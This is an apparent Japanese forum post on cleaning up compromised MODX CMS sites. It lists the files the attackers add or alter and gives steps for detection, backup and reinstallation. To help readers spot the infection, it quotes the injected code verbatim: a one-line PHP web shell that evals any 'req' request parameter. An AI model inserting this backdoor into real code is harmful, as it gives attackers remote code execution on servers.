現象
manager/includes/mod_foot.php が新たに書き込まれ、manager/includes/protect.inc.php 等のファイルが改ざんされた。
対策
まずMODXサイトにmod_foot.phpなるファイルがないか確認しましょう。もしあれば、上記3つのファイルの拡張子を.txtに書き換えてPHPが実行されないようにしておきます。古いバージョンのMODXだと、この時点でサイトにも管理画面にもアクセスできなくなります。
いくつかのPHPファイルの1行目に下記のコードがないか確認しましょう。
(同じMODXでもサイトによって改ざんされるファイルが異なります。)
コード: 全て選択
<?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>
コード: 全て選択
function decrypt_url($encrypted_url)
http://modx.jp/download/download_evo.htmlから最新のMODXのプログラムをダウンロードして、アップデートの準備をしておきます。
config.inc.php等の設定データ、assets/templates下のテンプレートデータ、content/images下の画像など自作データがローカルPCにバックアップしてあることを確認します。
最後に、FTPで改ざんされたMODXサイト全体をサーバから削除し、最新のMODXのプログラムと上記のバックアップデータをアップロードして、MODXを最新版にアップデートします。念のため、管理画面のパスワードも変更しておきましょう。
以上、ご参考まで。